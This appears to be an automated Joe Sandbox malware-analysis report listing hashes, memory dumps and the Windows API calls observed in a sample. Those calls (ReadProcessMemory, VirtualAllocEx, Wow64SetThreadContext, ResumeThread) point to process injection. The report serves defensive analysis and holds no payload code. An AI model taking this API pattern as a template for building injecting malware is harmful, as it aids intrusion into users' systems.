                                                  • Opcode ID: aaa33af7c5e25f96a16d3ad7a17e33092a34f6f32cdb906d3eb4e54c0291ffde
                                                  • Instruction ID: 0a4bbf30a51203d2fc6f7272b96a3df32cf7266f5186c67b40d18e1310780b0f
                                                  • Opcode Fuzzy Hash: aaa33af7c5e25f96a16d3ad7a17e33092a34f6f32cdb906d3eb4e54c0291ffde
                                                  • Instruction Fuzzy Hash: B42127B19003599FCB10DFAAC885BEEBBF5FF48320F108429E959A7250C7789954CBA4

                                                  Control-flow Graph: ReadProcessMemory (rendered graph not reproduced)
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A895C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: a5ce67c59a90b1ade780f59f1735e5594b2185d3dd605bfa25207d279ff804f5
                                                  • Instruction ID: 5c2f09f7f3eec791d1a4dfc3ce8530adfe10bc8cf52670d3524a40b2042fd6d7
                                                  • Opcode Fuzzy Hash: a5ce67c59a90b1ade780f59f1735e5594b2185d3dd605bfa25207d279ff804f5
                                                  • Instruction Fuzzy Hash: 222128B1D003599FCB10DFAAC881AEEFBF5FF48314F10842AE959A7250C734A545CBA5

                                                  Control-flow Graph: DuplicateHandle (rendered graph not reproduced)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 32736e40ab7d6dfbd67b7aae2b679b408fdfa30dbec440c316dafcc278f26038
                                                  • Instruction ID: da068ecf5a46db99430edb11dd0b7cff901a0738b4a555678c81d781f7f2c39a
                                                  • Opcode Fuzzy Hash: 32736e40ab7d6dfbd67b7aae2b679b408fdfa30dbec440c316dafcc278f26038
                                                  • Instruction Fuzzy Hash: 292103B59002489FDB10CFAAD584AEEFFF4EB48310F14805AE958A3250C374A945CFA0
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A895C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6bdf2ca59b59c1973e5a5b0be49c2107f28558878ef45ca0a5546591d670511f
                                                  • Instruction ID: 2e5caa7518c8f4b20cdcca009b484dd83f8396c24730bcb23893a374c17140a8
                                                  • Opcode Fuzzy Hash: 6bdf2ca59b59c1973e5a5b0be49c2107f28558878ef45ca0a5546591d670511f
                                                  • Instruction Fuzzy Hash: 6A2139B1D003599FCB10DFAAC840AEEFBF5FF48310F108429E559A7250C7349544CBA4

                                                  Control-flow Graph: Wow64SetThreadContext (rendered graph not reproduced)
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05A88AC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 4f5c9ce8de754e313d090937c68b93ba7cbd6b38d89274090a0cdb7a3aa79e10
                                                  • Instruction ID: a531e890c62c8ee8be6bb162117c5f6cc66139ee42dff21816463f92d3ab55d3
                                                  • Opcode Fuzzy Hash: 4f5c9ce8de754e313d090937c68b93ba7cbd6b38d89274090a0cdb7a3aa79e10
                                                  • Instruction Fuzzy Hash: E4211AB29042098FDB10DFAAC445BEEFBF4EF48314F548429D459A7241CB78A544CFA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 1a511c96adf0c1780861c09650630ddc42b940afb56f9e7c732fa55ca1335794
                                                  • Instruction ID: 4bd725c1e07e98cdf1a9214a1921cc22c74697c951bac8d9fc6a5dba7c3077a6
                                                  • Opcode Fuzzy Hash: 1a511c96adf0c1780861c09650630ddc42b940afb56f9e7c732fa55ca1335794
                                                  • Instruction Fuzzy Hash: 8921E4B5900248DFDB10CF9AD984ADEFFF8EB48310F14841AE958A7350C374A954CFA4
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05A88AC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: d06f513b85b085891c9a4890b4021fc8db3b23cd93c6a7185e0258bce140b410
                                                  • Instruction ID: e3cc34da47f3c19725fee7c3349c4818493da0a2169c54c00af174783284cf93
                                                  • Opcode Fuzzy Hash: d06f513b85b085891c9a4890b4021fc8db3b23cd93c6a7185e0258bce140b410
                                                  • Instruction Fuzzy Hash: C62137B69002098FDB10DFA9C585BEEFBF4EF48314F54882AD459A7241CB78A544CFA4
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A893FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: f100a0d0bba4d197fec1eddc736809826ad17592d4c4e3b6dc10ff4d2afa647f
                                                  • Instruction ID: 9354cfe9945cd61ee5a03cc3394af42cd812225b50106c90eab8b0d7f0993888
                                                  • Opcode Fuzzy Hash: f100a0d0bba4d197fec1eddc736809826ad17592d4c4e3b6dc10ff4d2afa647f
                                                  • Instruction Fuzzy Hash: 32115672900248DFCB20DFAAC845BEFBBF5EF88324F148419E559A7250C775A544CFA4
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B101,00000800,00000000,00000000), ref: 0130B312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 7f831569065e1c16148dc87307e87d13b0693e4a740a696a56349e7dc096eb08
                                                  • Instruction ID: 86cf75080362f35487ced5a89e4309d307fc2981d722972f047a115285552459
                                                  • Opcode Fuzzy Hash: 7f831569065e1c16148dc87307e87d13b0693e4a740a696a56349e7dc096eb08
                                                  • Instruction Fuzzy Hash: 1F1112BA9003499FDB20CF9AD444ADEFBF8EF48314F10842AE959A7350C375A944CFA4
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A893FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 904707ebc689202b851e68d760d3c5c5f6096ca3ebd3d9953fd16eadff0f32c3
                                                  • Instruction ID: 638d211379189ee6c0c8b58ce736c6bc3e3d0f7d2e5a6b1b03a2b2d21f48419e
                                                  • Opcode Fuzzy Hash: 904707ebc689202b851e68d760d3c5c5f6096ca3ebd3d9953fd16eadff0f32c3
                                                  • Instruction Fuzzy Hash: FA1126729002499FCB10DFAAC844AEFBBF5EF88324F108419E559A7250C775A554CFA4
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B101,00000800,00000000,00000000), ref: 0130B312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 09d6af2b2c7c6fc3313cb8316d2684127611181ae36fc936d8782d080f802e00
                                                  • Instruction ID: 8f8164677ad04a17076e658c96c9fa03ae8ea271104f34f1d23e33ab5f6b4482
                                                  • Opcode Fuzzy Hash: 09d6af2b2c7c6fc3313cb8316d2684127611181ae36fc936d8782d080f802e00
                                                  • Instruction Fuzzy Hash: CA1123BA8002498FDB14CFAAC444ADEFBF4EF88314F10846AD959A7251C375A545CFA0
                                                  APIs
                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,4005A5D3), ref: 05A889FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: c2a26a34364e75ba6d9385a03a69f1ee154c40cbfff315b3d47b4e8d27a16550
                                                  • Instruction ID: dfdff24a1003c765e27eb2fde187e4e0ad5b319b645a0cc01e680e9ec07d5a83
                                                  • Opcode Fuzzy Hash: c2a26a34364e75ba6d9385a03a69f1ee154c40cbfff315b3d47b4e8d27a16550
                                                  • Instruction Fuzzy Hash: 6B115BB19042498BCB20DFAAC444BEFFFF4AF88324F108819D599A7250CB39A944CB94
                                                  APIs
                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,4005A5D3), ref: 05A889FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 9f4aaf96f8062555270f15c84fdc7d9c932217feb5157f6980e56bd1af738bba
                                                  • Instruction ID: 4641c3a022d7f136d9c82ba6fb7a430011cb8db4c8f77f321a5571f22d25f56b
                                                  • Opcode Fuzzy Hash: 9f4aaf96f8062555270f15c84fdc7d9c932217feb5157f6980e56bd1af738bba
                                                  • Instruction Fuzzy Hash: B5113AB19042498FCB20DFAAC4457EEFBF4EF88324F208819D459A7250CB79A544CF95
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0130B086
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: ea619777abd79dbc4be9d413c819c8b3abd478a737aea2360bececf7d0901b95
                                                  • Instruction ID: 6723c5c4396b67fbba1451a787b6c7efe84047d78aad76b57912eb3db7808669
                                                  • Opcode Fuzzy Hash: ea619777abd79dbc4be9d413c819c8b3abd478a737aea2360bececf7d0901b95
                                                  • Instruction Fuzzy Hash: F41120B6C002498FDB20CFAAD444ADEFBF4AF88314F14845AC468B7251C375A549CFA0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0130B086
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: a3fe88b011a9b035197d34472241746fdcb4241f5709ed1b7b13cd2040e3e500
                                                  • Instruction ID: 322d3b4c63b52b25993baa9688bf612fe1b72417290ee6f0b772635c0acd885c
                                                  • Opcode Fuzzy Hash: a3fe88b011a9b035197d34472241746fdcb4241f5709ed1b7b13cd2040e3e500
                                                  • Instruction Fuzzy Hash: A511D2B6C003498FDB20DF9AD444ADEFBF4AB48314F10841AD569B7250C375A545CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 05A8E02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 6d3f46860278fb340ef79c4d06f489fd2ca058e071c7626ba309c5b28f3864bd
                                                  • Instruction ID: 07bf9a1451e261e7bb57cc0281f80789f2f92641d5b1e85ff8536feac6a9ee1f
                                                  • Opcode Fuzzy Hash: 6d3f46860278fb340ef79c4d06f489fd2ca058e071c7626ba309c5b28f3864bd
                                                  • Instruction Fuzzy Hash: 141125B5800349CFDB10DF99D944BEEBBF8FB08310F14884AD458A7211C379A544CFA0
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 05A8E02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720479037.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_129d000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720479037.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_129d000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1730916890.000000000A830000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A830000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a830000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd

                                                  Execution Graph

                                                  Execution Coverage:7.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:5
                                                  Total number of Limit Nodes:0
execution_graph (rendered graph; recovered node list): 138ae98 DuplicateHandle -> 138af2e; 6603f78 -> 6603fbe GlobalMemoryStatusEx -> 6603fee
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-358201761

                                                  Control-flow Graph

• Legend: Executed / Not Executed
control_flow_graph (rendered basic-block graph, not recoverable as text): function starting at 668c218, basic blocks spanning 668c218 through 668c8d0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Uc<$$^q$$^q$c<$c<
                                                  • API String ID: 0-1836474973
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 49b372b18ac2003f4d03ee79e00fd4abdf643a27db8b7aa21d371a17096715e4
                                                  • Instruction ID: b639c0399c0a17774690d6d36c95486e64770e79afcf241ec0b549e6e772e3fe
                                                  • Opcode Fuzzy Hash: 49b372b18ac2003f4d03ee79e00fd4abdf643a27db8b7aa21d371a17096715e4
                                                  • Instruction Fuzzy Hash: EA22AF35E002059FDF64EFB9C4846AEB7F2EF85314F20866AD55AAB344DA31DC42CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 439bb842a1111a20f300b0a1200d8d15b85739469794c080102e350081d13353
                                                  • Instruction ID: 43bc4d634d25f6c3fcf067b90b42399d06c4573c3637214c57a6bed8b82da256
                                                  • Opcode Fuzzy Hash: 439bb842a1111a20f300b0a1200d8d15b85739469794c080102e350081d13353
                                                  • Instruction Fuzzy Hash: D613F531C10B1A8ECB51EF68C8805A9F7B1FF99300F55D79AE45877221EB70AAD5CB81
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c067218ec27d12f9d85b885c43a72324ff2bed81d0958c2bc288b5ec6a93e6c
                                                  • Instruction ID: ae2d917f07bdb1fd0204fdbee54a28605b0a6b106df48d1a9db685d44b0735db
                                                  • Opcode Fuzzy Hash: 7c067218ec27d12f9d85b885c43a72324ff2bed81d0958c2bc288b5ec6a93e6c
                                                  • Instruction Fuzzy Hash: 37629030B002059FDB54EBB8D5946AEB7F2EF84314F14866AE806EB391DB75DC42CB91

                                                  Control-flow Graph: function starting at 668d718 (graph node data omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $c<$kc<$uc<$}c<$$^q$$^q$$^q$$^q$c<
                                                  • API String ID: 0-206387987
                                                  • Opcode ID: 06610be9c5ab310afc4a828761c44ebf05715651a4d8d8f3eadcc9a2f62e7002
                                                  • Instruction ID: 0c413c935d9c687c3ffb632fc171b641aa09d5fe865e6a1a63018e8458c0ddba
                                                  • Opcode Fuzzy Hash: 06610be9c5ab310afc4a828761c44ebf05715651a4d8d8f3eadcc9a2f62e7002
                                                  • Instruction Fuzzy Hash: 8EC1FD70E002199FDB64EF65C95079EB7F6AF89304F5085AAC40DAB394DB709D82CFA1

                                                  Control-flow Graph: function starting at 668f5a0 (graph node data omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-3823777903
                                                  • Opcode ID: f2d4108af59ffaad975fd984b4e1f41d8dbe6674ed8dda80a353fbca1fe51391
                                                  • Instruction ID: bfc7aae2bf0426b5dd5ce93bdaa8b6dadf3f321e542781ccab9c4595ad038524
                                                  • Opcode Fuzzy Hash: f2d4108af59ffaad975fd984b4e1f41d8dbe6674ed8dda80a353fbca1fe51391
                                                  • Instruction Fuzzy Hash: 7DE16D30E1030A8FDB68EFB9D4546AEB7F2AF85254F208629D405EB354EF71D846CB91

                                                  Control-flow Graph: function starting at 668d707 (graph node data omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $c<$kc<$uc<$}c<$$^q$$^q$c<
                                                  • API String ID: 0-2146872185
                                                  • Opcode ID: 48fe9b24bd5a2995587920823e155fa3f1cf57fbd12dff0955bd4754d482dc3f
                                                  • Instruction ID: 9a57d36f1c659aed1e6f9d6b74b44cba3d910fdf0d1c1341e65ed9a46a7898c4
                                                  • Opcode Fuzzy Hash: 48fe9b24bd5a2995587920823e155fa3f1cf57fbd12dff0955bd4754d482dc3f
                                                  • Instruction Fuzzy Hash: 2C910070E012199FDB64EF64D950BEEB7F6AF89304F5045AAC40DA7394DA309D81CFA1

                                                  Control-flow Graph: function starting at 6688a70 (graph node data omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq$\Ocq
                                                  • API String ID: 0-3575482020
                                                  • Opcode ID: 876218a5f43ea66986cd31c5d649f2cdfc3789bff0f08d6a61887faa98d8b274
                                                  • Instruction ID: ad603df67e2d339bce71581ac97f75b69e756b760d5f29269a62f144f7d0d0ba
                                                  • Opcode Fuzzy Hash: 876218a5f43ea66986cd31c5d649f2cdfc3789bff0f08d6a61887faa98d8b274
                                                  • Instruction Fuzzy Hash: AE517470F002199FEB54ABB8C4147AEBAE7EB88740F504529D546EB384DEB54C02CF91

